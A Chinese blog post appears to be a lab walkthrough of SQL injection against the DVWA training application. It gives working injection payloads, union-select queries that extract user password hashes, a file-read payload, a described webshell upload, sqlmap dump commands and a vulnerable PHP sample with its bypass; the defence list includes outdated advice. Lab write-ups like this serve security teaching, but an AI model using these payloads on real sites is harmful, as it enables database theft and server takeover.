DVWA SQL注入

最新推荐文章于 2024-07-03 22:07:19 发布
最新推荐文章于 2024-07-03 22:07:19 发布
阅读量496 收藏 3
点赞数 1
分类专栏: 安全 文章标签: 代码审计

SQL注入漏洞作为OWASP TOP10中重要的一部分

一、原理

通过web程序,在数据库里执行任意SQL语句。根源在于程序命令和用户数据(用户输入)之间没有做到分开。

二、发现

1、确认注入POC

(1)检测是否存在注入:
	可以得知此处位注入点,尝试输入 ‘ (英文单引号)时,出现如下错误提示:
	
	 You have an error in your SQL syntax; check the manual that corresponds to your MySQL
	 server version for the right syntax to use near ””’ at line 1
	
(2)尝试遍历数据库表,由于用户输入的值为ID,因此我们习惯判断这里的注入类型为数字型,因此尝试输入:1 or 1=1 ,看能否把数据库表中的内容遍历出来。可是结果如下,并没有显示出所有信息
(3)于是猜测,是否后台应用程序将此值看做了字符型,于是输入:1'or'1'='1,结果,遍历出了数据库中的所有内容,如果是重要数据库表,可能这个信息已经对于攻击者,有了足够意义:如图

2、确定查询函数(order by)

(4)测试查询信息列数。利用语句order by num 
	这里我们输入 " 1'order by 1 -- " 结果页面正常显示,注意-- 后面有空格。继续测试,
	1'order by 2 	-- , 1'order by 3 -- ,当输入3是,页面报错。页面错误信息如下,Unknown 
	column '3' in 'order 	clause',由此我们判断查询结果值为2列 
(5)通过得到连接数据库账户信息、数据库名称、数据库版本信息。利用user(),及database(),version()
       等三个内置函数。

3、确定回显点(union select):

(6)这里尝试注入 1' and 1=2 union select 1,2 -- 结果如下
从而得出First name处显示结果为查询结果第一列的值,surname处显示结果为查询结果第二列的值,利用内置
函数user(),及database(),version()注入得出连接数据库用户以及数据库名称:
1' and 1=2 union select user(),database()  -- 
1' and 1=2 union select version(),database()  --

4、查询数据库信息

(7)获得操作系统信息
1'and 1=2 union select 1,@@global.version_compile_os from mysql.user --
(8)查询表名:这里利用mysql默认的数据库infromation_scehma,该数据库存
储了Mysql所有数据库和表的信息。
1'  union select 1,table_name from information_schema.tables where table_schema='dvwa' -- 
(9)查列名
1'   union select 1,column_name from information_schema.columns where table_name='users' --  
(10)查字段名
  1’ union select user,password from users -- 
至此,相当于把用户表的裤子脱下来了,然后再把密码经过md5解密就ok了。当然除了单纯的获取用户信息脱裤
外sql注入还有其他的用法

5、

(1)load_file()文件加载
	1’ union select 1, load_file(“h://test.txt”) --

在这里插入图片描述

(2)直接写入webshell木马
需要满足一定的条件:
<1>需要知道要上传的木马的服务器绝对路径,可以配合其他漏洞收集此资料
<2>需要有足够大的权限,可以上传文件
<3>magic_quotes_gpc() = Off
构造SQL语句:
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761 -- 
我们上传一句话木马,密码是cmd,上传的路径是 E://xmapp//htdocs//DVWA-1.0.8下的1.php文件
提交之后如果没返回错误页面,一般就是上传成功,我们可以到路径下进行查看

在这里插入图片描述
页面没有返回源代码中的信息,表示木马上传成功,我们用菜刀链接一下

在这里插入图片描述
链接成功,拿到网站的webshell。

SQL注入漏洞的防御:

(1)对用户输入的参数进行转义和去下划线等安全处理

(2)控制好数据库管理员和普通用户的权限

(3)开启magic_quote_gpc()选项

(4)服务器安装安全狗等防注入设备

(5)采用强度大的密码,即便被脱裤也很难被破解,或直接采用很难短时间破解的加密算法

(6)定期更新系统,对出现的漏洞及时修补

当然,除了手工注入外,我们可以使用强大的SQL注入扫描工具sqlmap来进行扫描:

先来探测一下该页面是否存在SQL注入漏洞,因为DVWA是需要登录的,需要用到cookie信息。可以通过F12打开开发者工具来获取用户的cookie信息,当然也可以通过其他方式来获取:
在这里插入图片描述
将cookie信息复制上去–cookie参数上运行下面的命令:

sqlmap -u "http://10.10.10.137/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --	cookie="security=low; PHPSESSID=4b83d8e86f5c43eff7dfa2b2be087838" --batch

其中-u参数指定目标URL,–batch参数采用默认选项、不进行询问。
结果发现是可注入的:
在这里插入图片描述
接着通过–dbs参数查看所有的数据库:

sqlmap -u "http://10.10.10.137/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --	cookie="security=low; PHPSESSID=4b83d8e86f5c43eff7dfa2b2be087838" --dbs --batch

这里我们只对dvwa数据库感兴趣,通过-D参数指定为dvwa数据库,–tables参数查看所有的表:
在这里插入图片描述
结果发现存在两个表,接着就扫描最感兴趣的users表了,通过-T参数指定表为users,–columns查看该表的所有列:

sqlmap -u "http://10.10.10.137/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4b83d8e86f5c43eff7dfa2b2be087838" -D dvwa  -T users --columns --batch

在这里插入图片描述
所有列名都知道了,下面直接用–dump参数将所有列的信息都列出来即可:

sqlmap -u "http://10.10.10.137/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4b83d8e86f5c43eff7dfa2b2be087838" -D dvwa  -T users --dump --batch

在这里插入图片描述
这样,几乎所有的信息都挖掘出来了,利用sqlmap来扫描的过程大致如此。

Medium级:
<?php 

if (isset($_GET['Submit'])) { 

    // Retrieve data 

    $id = $_GET['id']; 
    $id = mysql_real_escape_string($id); 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; 

    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 
     
    $num = mysql_numrows($result); 

    $i=0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 
         
        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        echo '</pre>'; 

        $i++; 
    } 
} 
?>

其中mysql_real_escape_string函数是实现转义 SQL 语句字符串中的特殊字符,如输入单引号’则处理时会在其前面加上右斜杠\来进行转义,如果语句错误则输出相应的错误信息。其中受影响的字符如下:
\x00 \n \r \ ’ " \x1a
虽然在代码中通过mysql_real_escape_string函数对一些敏感字符进行了相应的过滤,但是在SELECT语句中变量id的值的获取并没有通过外加单引号或者双引号来实现,即那层过滤也形同虚设,只需在输入中连需要闭合用的单引号等都不需要添加了,直接输入相应的语句即可:
例子中payload为:
1 union select table_name,table_schema from information_schema.tables
stripslashes函数是实现删除反斜杠的功能

引号绕过(使用十六进制编码): **
关于为啥要16进制看这
在这里插入图片描述

洁洁儿
关注
专栏目录
dvwasql注入
BAIXUAN9527的博客
03-27 528
SQL i 攻击者在web表单或者页面请求的查询字符串通过查询的字符串恶意的注入SQl命令,从而使数据库执行恶意的SQl语句 1验证web存在SQL漏洞 2寻找注入点 2.1web页面某个表单的输入框里 2.2web页面的URL查询(带参数的URl) 3构造攻击的SQL语句 4通过注入点提交构造的攻击语句,构造的SQL在数据库执行 5通过web页面返回数据,提取分析我们想要的数据信息 注入点类...
kali下的SQL注入DVWA sql注入 low等级)
weixin_43749051的博客
03-06 2054
(1)在kali下打开浏览器,输入http://192.168.0.184(win7的IP地址)/DVWA/login.php 输入账号密码登录进去,然后点击左侧的“DVWA Security”,选择“low”级别,点击选定。 (2)打开火狐浏览器,添加附件组件tamper data,安装后打开,然后登录dvwa,获取cookie值 (3)获取要测试的url,点击SQL Injection菜单,在输入框输入1,点击submit,获取待测试的url:http://192.168.169.129/dvwa
DVWASQL注入
RexHa的博客
09-27 2119
DVWA靶场sql注入三个级别通关
DVWA靶场SQL注入
最新发布
Tangyoo的博客
07-03 1123
SQL注入是指攻击者通过在Web表单输入字段、URL参数、HTTP头部等位置插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
DVWA-SQL注入
acdcccc的博客
08-26 318
分享DVWA靶场的SQL注入过程
DVWA——SQL注入
qq_62803993的博客
01-08 2472
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
dvwa——sql注入
GZY0601的博客
09-16 626
Hello!转眼一看距离我上次发文章都是一年前的事情了,职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库。
DVWASQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入(low)级别,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
dvwa sql注入
08-27
DVWA 进行 SQL 注入练习,可以通过以下步骤进行: 1. 安装和配置 DVWA:首先,需要下载 DVWA,并将其部署到本地服务器或虚拟机。然后,根据提供的说明进行配置,设置安全级别为“低”。 2. 寻找 SQL 注入点...
DVWA-sql注入
Darklord.W
04-09 372
sql注入高步骤截图及说明 低: 判断注入类型 判断字段数 判断回显位置 查询数据库版本以及数据库名 查询数据库内表名 查询表内字段名 查询用户名密码 : 发送到repeater 判断注入类型 猜字段数 判断回显位置 查询版本以及数据库 查询表名 查询字段名 高: Hig...
DVWA下的SQL注入
07-25
SQL
dvwa-sql注入
AI_SumSky的博客
11-27 5831
sql注入 low级别 万能sql语句试一试1’ or '1=1,发现遍历出了全部用户信息 分析源码发现该后台对传入的sql语句没有任何限制和过滤就直接执行,确认存在sql注入漏洞就可以开始摸数据库信息了,或者用工具sqlmap直接莽就完事了 用order by测试字段为2,这是为了后面用union方法,这个方法相关联 的两个查询语句查询参数个数必须相等 由源码函数可知该数据库是mysql可以用级联的方法套数据库信息,1’ union select database(),user()#查看当前数据库和
DVWA(sql注入)
weixin_44023403的博客
12-09 364
DWVA (sql注入SQL注入简介Low SQL注入简介 SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至执行篡改数据库等操作。 Low 输入1,用burp进行抓包; 将报文头复制,存储到txt文件,命名为sql.txt; 打开sqlmap,用它去扫描文件,查看返回信息判断该网站是否存在SQL注入漏洞; 打开cmd,输入命令 python sqlmap.py -r "文件存储地址和文件名" --lev
DVWA SQL注入
m0_55605024的博客
03-01 511
简而言之,是在输入字符串之注入SQL指令,在设计不良的程序当忽略了字符检查,那么这些。如:将'dvwa'替换为database() or 替换为0x64767761(将'dvwa'进行16进制编码)2.安装kali操作系统,kali自带sqlmap,可以直接输入sqlmap执行。注入进去的恶意指令就会被数据库误以为是正常的SQL指令而运行。--dbs:database serve 获取所有的数据库名。database():返回当前数据库的名称。防御命令执行的最高效的方法,就是。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值